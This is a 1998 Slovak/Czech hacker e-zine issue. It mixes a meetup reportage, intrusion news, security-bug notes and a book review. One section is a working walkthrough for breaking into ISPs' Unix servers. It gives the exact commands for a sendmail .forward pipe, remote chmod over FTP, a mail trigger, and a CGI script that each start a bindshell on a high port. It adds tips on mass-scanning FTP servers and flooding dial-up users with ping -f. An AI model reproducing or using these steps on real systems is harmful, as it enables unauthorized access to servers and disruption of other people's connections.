::::::::::. :::::::..   :::.,::::::   :::         ...     .        :   
    `;;;```.;;;;;;;``;;;;  ;;;;;;;''''   ;;;      .;;;;;;;.  ;;,.    ;;;  
     `]]nnn]]'  [[[,/[[['  [[[ [[cccc    [[[     ,[[     \[[,[[[[, ,[[[[, 
      $$$""     $$$$$$c    $$$ $$""""    $$'     $$$,     $$$$$$$$$$$"$$$ 
      888o      888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
      YMMMb     MMMM   "W" MMM """"YUMMM""""YUMMM  "YMMMMMP" MMM  M'  "MMM
   
   prielom #3, 4.3.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/
   


obsah




intro

nazhromazdilo sa mi doma kopu materialov, takze vypustam tretie cislo prielomu par dni po druhom. pokial xcete dostavat e-mailom oznam ked vyde nove cislo prielomu, poslite mejl s textom "subscribe prielom" na adresu prielom(at)hysteria.sk.

pajka, 3.2., piestany



reportaz z cZert session

Kolem CzERT SESSION bylo na ceskem a slovenskem internetu docela zivo. Na webu se valely velke reklamni bannery, oznamujici, ze sraz je 17. ledna v 18 hodin u Vaclava na Vaclavaku v Praze.

Kdyz jsem prisel ke koni, upoutala me na prvni pohled skupina vystredne (kyberpunkove) oblecenych lidi. Obcas k nim nekdo jim podobny prisel, podali si zvlastnim zpusobem ruce a debatovali v jakemsi subkulturnim slangu. Meli vsichni strasne divny boty. Byli mezi nima i typkove, co vypadali presne jako zadrzeni hackeri z novin, dlouhe vlasy, plnovous, divoke oci, obleceni v cernem. Prava subkultura. Prichazeli mezi ne dalsi a dalsi a me jen udivovalo, ze je mezi nimi docela velke procento zen. Hackerky? Asi tezko, ale proc by hacker nemohl vzit na session - spolecenskou udalost pocitacoveho undergroundu - svou pritelkyni? Skupinka se stale rozrustala a ja, sedice na lavicce, pozoroval jsem jednim okem je a druhym par !NENAPADNICH! fotografu a kameramanu, kteri se, JEN TAK prochazeli kolem, fotaky otevreny, prsty na spousti, cervena svetylka kamer svitila do stale houstnouci tmy.

Par prislusniku teto zvlastni subkultury se obcas odtrhne a odejde kamsi -- napred. Obavam se, ze vypadam malo vystredne.

O kus dal stoji skupinka nekolika naprosto NORMALNICH lidi, co kdyz TO jsou ONI. Posouvam se mezi obe skupinky. Ze skupinky CYBERPUNKERU se ozyva sluvko INFORMACE, kdosi z NORMALU rek IMEJL. To ale nic neznamena, mejl prece pouziva kazdej.

Jmeno PAJKUS, ktere zaslechnu od NORMALU me presvedcilo. Hackeri nevypadaji jako HACKERI, co je znate z filmu, nepoznate je od Tomase Stuchlika z vasi tridy. Nebavej se ani moc o pocitacich. Kyberkultura, vybasnena Gibsonem a Sterlingem, jako by se jich netykala.
Prichazi Pajkus.
Grupa se vydava po silnici dolu po Vaclavaku. Auta se vyhybaji skupine asi dvaceti nejvetsich hackeru z Cech a ze Slovenska. Ptam se Pajka prave na kyberkulturu. "Jediny, co se me z kyberkultury tyka , je iRC. Vecer sednu k pocitaci, pokecam s kamaradama a potom nekdy beham po nejakych tech masinach."
Hackeri dorazi "na misto" - do restaurace Ve Zlate, ktera pozdeji vstoupila do dejin policie.
"Miro, bude pristaveny autobus do Bartolomejske?" vtipkuje kdosi.
"No jasne, puvodne jsme to chteli udelat v te kavarne primo naproti prezidia, abychom si jenom poposli..."

Nad veceri se hackeri, dosud vesmes mlcici zacinaji rozpovidavat, diskuse se docela slusne rozbiha. Kdyby dlouhy stul obsazeny kosatym rodinym klanem obhledl nekdo nezasveceny, tipnul by si, ze si proste par studentiku zaslo na veceri a docela dobre se bavej. Oblibena barva hackeru je cerna a vetsinou to i sedi (jen Pajkus ma bilou kosili).
Pajkus ma nyni firmu, ktera se stara o bezpecnost pocitacovych siti. Jako hacker vi, kde jsou v systemu skviry, ale zna i postupy na jejich zatmetleni. Je schopen zarucit maximalni bezpecnost, simulovat hackerske utoky... Neni to "nemoralni", pouzivat vedomosti ziskane jakymsi SKODENIM k nejakemu odobnimu prospechu?
"Proc?" smeje se, "hackeri budou vzdycky napred pred adminama. Admin jenom mzoura za serverem a kdyz obcas nekdo zautoci, ucpe sem tam nejakou diru. Ale kdyz ja beham po masinach, muzu na jeho stroj utocit cele tydny, zkoumat ho a hledat skulinku, vzdycky jsem jako hacker napred."
"Ma informace," doplnuje ho Ook, "tak je pouzije."
Pajkus, Ook a MiRaGe se mi snazi vysvetlit, ze hacking, tak jak je delaji cZerti neni nic spatneho.
Stale me desi to, ze hacker, ktery profesionalne zabezpecuje site, si muze nekde nechat skulinku, backdoor.
"CzERT, ten folklor kolem toho a vsechno to ostatni -- to byla jenom studentska prca. Recese, tak jak to studenti delavaji. Nikdy nemicham CzERT a business dohromady."

Z Ooka se vyklubal filozof mezi hackery. Mluvi v dlouhych, uhledne skladanych vetach, klidne, snazi se mi vysvetlit filozofii toho, co je pro ostatni zlocin.
V dnesni dobe muze hackovat kdokoliv. K dispozici jsou prirucky pro zacatecniky i pokrocile, hackerske utility, popisy der (bugu)... CzERTE na svych strank ch nabizeji utlity, se kterymi uz musite umet pracovat. Hrebiky, drevo, zelezne soucasti a titevu, ze kterych si samostril sice postavite, ale musite to umet.
"Pokud nekdo zverejni popis bugu, je to jedna vec. Kdyz nekdo zverejni bug a zpusob, jak ho zneuzit, je to vec druha. A kdyz nekdo zverejni utilitu, kterou staci jenom zkompilovat a shazujes masiny, je to taky neco jinyho. Jsou k dispozici programy, ktery akorat zkompilujes a uz to pada. TO me desi. a TO mi prijde nemoralni, kdyz nekdo zverejnuje takovyhle veci. Predstav si trinactiletyho pubertaka, kterej si rika hacker..."
"Pockej," prerusuje ho Pajkus, "trinacti se mi zda dost malo..."
"Jo, par takovejch jsem videl," nenechava se vyvest z rovnovahy, "vis, jak si prijde silnej? Je boss, stahne si nejakyho Nuka a schodi masinu."
"No vlastne jenom zresetuje..."
"Jo, jenze jak to nabutuje, hodi to znova."
"WinNuke je nejhorsi," dodava MiRaGe, "je to normalni windousovej Drag-n-Drop, Kazdej, kdo vi, co to je mys, s tim umi zachazet..."
Zacinam sdilet jejich obavy. "Je mozny shodit treba celou domenu?" ptam se.
Ne, routery jsou stale jeste dobre chraneny. Ale tak pred rokem, kdyz se objevil jeden novy bug, to mozny bylo. Zamindrakovanej pubertak mohl shodit klidne cely cesky internet."
A co technicky reseni. Jak je tezke hackovat?
"My cZerti jsme vlastne meli docela stesti," prozrazuje Pajkus, "ze jsme objevili jeden docela neznamy bug, jinak ty utoky byly na docela nizke technicke urovni."
Rutina. Na hacknuty server (tak dva az tri denne) se umisti presmerovavac paketu (redirector). Prikazy, ktere hackeri pouzivaji, jsou zdanlive odesilany z tohoto stroje.
"Pres dva tri redirektory me nema nikdo sanci vystopovat," zacina se chlubit Pajko.
"Ale ma," krouti hlavou Ook.
"Jo, ale musel by bejt stejne dobrej jako ja. Nebo lepsi," usmeje se.
"Jenze u nas neni nikdo, kdo by te sledoval. Jednou jsem neco hackul a asi za tyden mi prisel mejl s takovym smesnym obsahem jako HA, HA, DOSTAL JSEM TE! !!!BOOOOM!!!, PRASKLO TO - a podobne. Ten spravce, misto aby si to spravil, me tejden hledal na webu. A pritom o anonymitu nejak moc nedbam."
Na radu prichazeji historky o navstevach agentu FBI na CVUT a univerzite v Bratislave -- studenti se obcas pokouseji probourat do americkych vl dnich pocitacu.

Dostavame se tedy k otazce bezpecnosti hackovani pro samotneho hackera.
"Nebojis se, ze nejaky nastvany spravce po tobe bude patrat a najde te?"
"Najde, proc by nenasel. Ale nic se nestane. Co by mi udelal? Jel by za mnou az na Slovensko? To by se mu ani nevyplatilo. To jako, ze by na me poslal nejake korby, aby mi daly nakl dacku? Proc? Snazim se neskodit. Vetsinou nejaka zmena stranek jeste udela tomu serveru reklamu."
Vycituji na jednu stranu jakousi symbiozu mezi spravci serveru a hackery a na stranu druhou i nelitostny boj. Dost casto je hacker admin a dobry admin je nekdy hacker. Ale nejde nekdy souboj az na ostri noze?
"Slovensko je preci jenom na vychode, bliz Ukrajine. My si na takovehle veci najimame ukrajinske delniky," rika s usmevem na tvari, ale najednou zvazni. "Jednou jsem honil jednoho hackera..."
"Hacker honil hackera?"
"Jo, hledal jsem takoveho darebaka, schodil jisty mistni uzel jednoho poskytovatele a tyden tam potom neslo spojeni. Provajdr byl hezky nastvanej. Nasel jsem ho a tam se to resilo nejakou takovouhle cestou. Ale o to jsem se uz moc nezajimal."
"Radeji," ozyva se po jeho levici. Prikyvuje.
Typkove, co vypadali, ze nekde na webu zahlydli banner, cekali, ze budou coby novackove nadsene prijati a zasveceni do vsech tajemstvi pocitacoveho zlocinu, co chvili pili kolu, pak koukali do zdi, uz znechucene odesli ke svym WinNukum.

Do klidne restaurace vrazi peticlenne policejni komando.
Jeden z nich zastupuje dvere.
"Hele, Dastych," ozyva se jizliva narazka na "jedineho pocitacoveho policajta v CR," kterym se on sam prohlasil. Autobus do Bartolomejske pristaven?
"Nezlobte se, ze vas rusime..." sype ze sebe policista nadrilovane fraze, "vim, ze tady mate uzavrenou spolecnost," doufejme, ze brzy ne ZAVRENOU, "ale dostali jsme anonymni oznameni," tak uz to byva , vsechno se svede na anonymni oznameni, "ze tady sedi pachatel," (takze jeden?) - hackeri znervoznuji a vrti se na zidlich, "loupezneho prepadeni!"
Stul rozvetvene kremikove familie se dava do huronskeho smichu. Velitel zasahu je zjevne zmaten, snazi se pravdepodobne studentiky, co si vysli na spolecnou vecri, uklidnit, ale moc se mu to nedari. Nakonec je zapsano rodne cislo, jmeno, adresa a takovy ty zbytecnsti vsech v restauraci, policiste se omlouvaji a zase odchazeji!

Kdosi ma mobil, vytaci spravce vsech novinkovych webserveru a oznamuje tu uzasne absurdni udalost.
K Pajkovi se pritaci clovek v cernem a spiklenecky mu ukazuje fialovy balicek, skryty v dlani: "Dame si do nosu?" "Jo," septa Pajkus. Hackeri pry casto konci na drogach. Ke svym nocnim toulkam po vlaknech pavuciny obcas vyuzivaji amfetaminy, stimulatory, ktere jim umoznuji byt vzhuru velmi dlouho do noci...
Poklada na stul balicek s psychedelickym potiskem - FIALOVOU KRAVOU.

Nad cokoladou se rec toci kolem modemu, investic do linek, warezu, skolnich siti...
Taky o tom, jak media prezentuji internet jako nebezpecnou oblast HACKERU, DETSKE PORNOGRAFIE, NAVODY NA BOMBY a NAKUPOVANI po siti pomoci kreditky, jejiz cislo vam ukradnou prave hackeri. Noviny se maji proc bat, ze je internet prevalcuje.

Opoustim provizorni doupe hackeru a cestou potemnelou prahou se vysmivam ceskym policistum. Dastych si pry vzal dovolenou.

Kangaroo

PS: vcera som dostal zaujimavy mail tykajuci sa policajnej razie na januarovej CzERT session. posudte sami :

Date Sun, 1 Mar 1998 123403 +0100 (CET)
From xxxxxxxxxxx
To pajkus(at)hysteria.sk
Subject info
MIME-Version 1.0
Content-Type TEXT/PLAIN; charset=US-ASCII
Status RO

ahoj pajkus,

Mozna, ze je tahle informace zbytecna a patrne nemusi mit nic spolecneho
s lednovou session, ale byl to pomerne zajimavy zazitek, takze Ti ho
podam, prestoze ma seteuid rozhozenou sit. ) (Moc neverim, ze by tam
policie CR posilala 3 tajne...)
Vcera mne kousek od domu zastavili dva policajti, jeden v civilu, jeden v
uniforme zasahovy jednoty ), a vyzadali si doklady. Kdyz jsem byl
zvedavy, nac to potrebuji, civil mi sdelil, ze "patraji po lidech".
Uprene mi ziral do obliceje a rikal (cituji) "musime takhle chodit,
protoze nemame pocitace" a v tomtez smyslu dal. ) Opsal si udaje a popis
meho zevnejsku, a pak se ptal, jestli se stale vyskytuju na MU (po 
serveru fakulty se posledni tydny prochazi jeden nebo vic lidi a minuly
tyden s nim/nimmi byli nejake mensi problemy). To, co mi ten chlapek
rikal, mi pripomina to, co CzERTu vzkazal cpt. D. po novinarich, tj. ze si
je "vychodi". )) 
Takze paranoidni alternativa zkouseji to podle seznamu, ktery si udelali
v Praze?


navrat na obsah


utoky na pentagon

patranie po tych ktori spachali to, co pentagon nazval "najorganizovanejsi a najsystematickejsi" utok na ich pocitacovu siet viedol FBI do maleho mestecka 100 kilometrov severne od San Franciska, do domu dvoch pubertakov, ktori su z tychto utokov podozrivi. noviny San Francisco Chronicle priniesli spravu ze FBI zatkli dvoch mladych podozrivych v cloverdale, kalifornii. v momente ked utvar rychleho nasadenia FBI vtrhol do domu jedneho z hackerov, sa pokusal tento mlady chalan naburat do pocitaca ministerstva obrany USA. FBI zhabali pocitace, diskety, vytlacky a tlaciaren.

cela sprava sa dostala na titulne stranky novin, ked namestnik ministra obrany john hamre povedal novinarom ze tento utok bol "najorganizovanejsi a najsystematickejsi aky dovtedy pentagon zazil". hackeri sa dostali do jedenastich pocitacov na roznych vojenskych zakladniach.
majitel provajdera Santa Rosa v kalifornii, ktory bol pouzity na utoky na vojenske zakladne ale vyjadril svoje pochyby o tom ze tito dvaja chalani boli jedini ktori sa na utokoch zucastnili.

"uz iba rozsah utoku ho odlisuje od nejakeho amatera", povedal bill zane z netdex internet services. "tito ludia to robili metodicky a organizovane. utoky boli podnikane kazdy den, v kazdu hodinu. bol by som velmi prekvapeny keby sa jednalo iba o tieto decka."


navrat na obsah



novinky zo sveta comp-security

a sakra. SSH - zakladny nastroj vsetkych bezpecnostne-uvedomelych surferov ma opat bug. zistilo sa ze je mozne exploitnut ssh daemon tak, ze si clovek upravi ssh klienta a moze sa lognut cez sshd ako akykolvek iny uzivatel, ktory pouziva RSA autentifikaciu. poucenie, ktore nam z toho vyplyva je zjavne - nikdy, nikdy sa nespoliehat v unixovom svete na akekolvek trust vztahy. ci su to .rhosts, hosts.equiv alebo RSA autentifikacia cez ssh-agent - zabudnite na to a pekne krasne radsej vzdy vytukajte svoje heslo. pre blizsie info namierte svoje browsery na ftp://ftp.secnet.com/pub/advisories/SNI-23.SSH-AGENT.advisory.

v polke januara sa objavil zaujimavy linuxovsky bug, ktory umozni utocnikovi ziskat roota na debiane 1.3.1 alebo slacku 2.x. jedna sa o program "deliver", ktory uklada postu uzivatelom do schranok potom, ako sa dostane na server. da sa prepisat stack na tomto programe vo funkcii copy_message() a execnut rootovsky shell. blizsie info na http://www.dec.net/ksrt/adv6.html.

stalo sa vam ze po kratkej hadke na irc vam zrazu zacali blaznivo blikat kontrolky modemu a po par sekundach padla linka ? stali ste sa pravdepodobne tercom "smurf" utoku, najnovsieho modneho hitu na vlnach irc. smurf posle stovky ICMP echo paketov na rozne servre, v tychto ICMP packetoch je spoofnuta zdrojova adresa (na vas pocitac) a tak sa k vam dostane zo vsetkych stran sprska paketov. aj ked to ma celkom pekny efekt, "smurfovat" vas prestane bavit po par sekundach. je to ale na prd ze su ludia na nete, ktori sa smurfovanim ludi dokazu zabavat cele hodiny. je to ale blbost, lebo v podstate ked ma clovek rootovsky pristup na nejaky server na SIX slovenskom peeringu (co zase nie je az take tazke), tak vlastne nie je problem zhodit k zemi hocijakeho slovenskeho dial-up-istu normalnym ping -f a netreba na to taketo programceky. preto zabudnite na smurf, je to drbly nastroj lamerov.

no a na zaver iba kratka informacia o novom bugu na AIXe. routed povoli zapisovanie hocijakeho suboru zvonku pod rootovskym pravami. to by bol sakra seriozny exploit, keby ho niekto napisal. nastastie sa to vsak obmedzilo iba na advisory.
http://www.ers.ibm.com/tech-info/advisories/sva/1998/ERS-SVA-E01-1998:001.1.txt


navrat na obsah



surfovanie po inet provideroch

iste viete ze vacsina slovenskych internet providerov neposkytuje shell konta na svojich unixovych serveroch. pokial poskytuju nejaky pristup na svoje servery, tak je to vacsinou iba ftp, aby si uzivatel mohol napriklad updatovat svoju www stranku. ochranu proti interaktivnemu (telnet) pripojeniu maju vacsinou slovenski provideri ale velmi, velmi chabu. nastavenie priemerneho unix servera inet providera by som charakterizoval takto :
- uzivatel ma pristup na server cez ftp
- telnet je zakazany tak, ze uzivatel ma ako shell nastaveny "/dev/null"
- telnet je zakazany pomocou hosts.deny alebo hosts.allow

boom, a tu vznika elementarny bezpecnostny problem. pokial ma uzivatel ftp pristup a pokial ma vlastny home adresar, do ktoreho moze zapisovat, nie je problem ziskat interaktivny pristup na server pomocou finty s ".forward". tato metoda je dost stara, ale zjavne je az natolko stara, ze sa na nu zabudlo. bavil som sa nedavno v blave na #holubnik irc session s par ludmi a oni sa ma na to pytali - a tak skrsla idea napisat o tom do prielomu.

postup je jednoduchy - staci uploadnut .forward na server providera a do neho vlozit prikaz na execnutie prikazu. totiz sendmail standardne povoluje execovanie suborov. staci vyrobit si nasledovny .forward subor :


$ cat .forward
|/tmp/scriptik
$

tento subor treba uploadnut do domaceho adresara. potom si pripravime subor "scriptik", napriklad takto :

$ cat scriptik
/tmp/bindshell &
$

bindshell je program, ktory otvori shell na vysokom porte. da sa stiahnut z arxivu (http://hysteria.sk/arxiv). aby sa fajly mohli execnut, musia byt executable. to sa da spravit cez prikaz "quote site chmod", takto :

$ ftp -nv
ftp> o server.provider.sk
Conected to server.provider.sk
ftp> user login heslo
ftp> cd /tmp
ftp> quote site chmod 755 bindshell
ftp> quote site chmod 755 scriptik
ftp> close

nuz a teraz staci poslat na to konto nejaky mejl, trebars prikazom "echo test | mail login@provider.sk". sendmail spusti /tmp/scriptik a ten spusti bindshell. potom staci telnet na vysoky port, a ziskate interaktivny pristup na server.

ako sa proti tomu branit ? jednoducho - treba obmedzit alebo znemoznit spustanie programov cez sendmail, je na to program ktory sa vola smrsh (http://nic.zcu.cz/ftp/pub/security/cert/tools/smrsh). druha moznost je nainstalovat iny postovy klient, napriklad smail neumoznuje defaultne execovanie akychkolvek suborov. druhy sposob je nakonfigurovat system tak, aby uzivatel nemohol zapisovat do svojho domaceho adresara.

specialna sranda vznikne ked je verejne zapisovatelny adresar anonymneho ftp. tym padom je mozne spravit vyssie popisany utok bez toho aby mal clovek na masine konto, je to potom kompletne externy utok. nastastie sa vsak uz asi tazko najde na nete server so zapisovatelnym root ftp adresarom. je ale mozne spravit script na kontrolovanie anonymnych ftp serverov a behom jednej noci otestovat takto tisice serverov. mozno by to viedlo k prekvapivym vysledkom.

dalsi sposob, akym moze ziskat uzivatel interaktivny pristup na providerov server su cgi scripty. pozrite sa do srm.conf vaseho httpd daemona. vacsina www serverov je nakonfigurovana tak, ze spustaju hocijaky subor s priponou .cgi ako cgi script. srm.conf sa to konfiguruje riadkom :


AddHandler cgi-script .cgi

potom staci ak si medzi html fajly strcite script, ktory vam execne vyssie spominany bindshell.. trebars taketo nieco :

#!/bin/sh
cat << EOF
Content-type: text/html

spustil sa bindshell...
EOF
/tmp/bindshell &

internet provideri na slovensku este stale trpia na horucku z amaterskeho nadsenia, sprevadzajucu vsetky zacinajuce hi-tech odvetvia. na unix administraciu nie su skoly, ucitelia, kurzy, ani knizky. servery drzia v rukach samoukovia-nadsenci, ktori cerpaju rozumy z downloadnutych HOW-TO fajlov, pokial zrovna nebehaju po klientoch a neinstaluju dial-up tcp/ip na windows. preto nie je tazke oblafnut ich jednoduchymi trikmi a obist tenke ochrany ich serverov. a mozno aj preto vyzera uroven sluzieb providerov tak ako vyzera, ale to uz je tema na dalsi dlhy zimny vecer. o tom nabuduce :)


navrat na obsah



bezpecnost intranetov - prihody zo zakopov

na zapade je bezpecnost pocitacovych sieti teraz modny hit. manazeri hovoria o tom aku klucovu ulohu hra bezpecnost a integrita dat pre ich podniky, ale malokto investuje cas, peniaze a pot na to, aby si fakt zabezpecil siet. existuje mnozstvo vcelku dobrej literatury o bezpecnosti pocitacovych sieti, na slovensko sa dostane vsak iba male mnozstvo vybranych kuskov. pokial zabudnete na tych par ozaj otrasnych titulov, zostane nam na vyber niekolko pompeznych akademickych studii problematiky compsecurity, ktore vacsinou spomenu skutocnu aplikaciu vysvetlovanej teorie iba na konci kapitoly ako cvicenie, alebo ako appendix.

Linda McCarthy vymyslela kompletne iny pristup k veci. vo svojej knizke "bezpecnost intranetov - prihody zo zakopov" nazhromazdila informacie zo skutocnych bezpecnostnych pripadov, kazda kapitola popisuje konkretny pripad z praxe, tykajuci sa computer security. mena ludi v tychto pripadoch su zmenene alebo vymazane, na ochranu poskodenych stran. obsah knizky je pevne zalozeny na "skutocnom svete" a poskytuje vyborny nahlad do mysle ludi, ktori pracuju v oblasti bezpecnosti pocitacov. akademikom budu urcite v tejto knizke chybat technicke detajly tykajuce sa jednotlivych pripadov. bezpecnost pocitacov je vsak podla mna ovela viacej *manazerska* zalezitost ako technicka zalezitost a tato knizka to potvrdzuje. je dokonca mozne ze sa vam bude zdat tato knizka blizsie ku stollovmu "kukickino vajce" ako trebars ku knizke "practical unix security".

knizka sa fajn cita a text je navzdusneny prijemnym stylom. kazda kapitola obsahuje popis incidendtu, zhrnutie problemov ktore k nemu viedli, a na zaver zhrnutie rieseni na odstranenie problemov. kazdy pripad je vybrany tak, aby zdoraznil nejaku inu konkretnu problematiku v oblasti bezpecnosti sieti.

tato knizka by mala byt na policke kazdeho administratora intranetovej/internetovej siete. pre cloveka ktory sa zoznamuje s comp-security poskytne uzasne mnozstvo zaujimavych informacii tak, aby ziskal spravne poziadavky a otazky. pokial patrite medzi skusenych bezpecnostnych specialistov, doporucujem vam kupit tuto knizku svojmu ekonomickemu riaditelovi - garantujem vam ze ked si precita desiatky pripadov hacknutych podnikov, okamzite vam zvysi plat a posle vas na skolenie do emeriky.


nazov knizky : "intranet security: stories from the trenches"
autor : linda mcCarthy, 1998
0-13-894759-7
vydavatel : prentice hall

navrat na obsah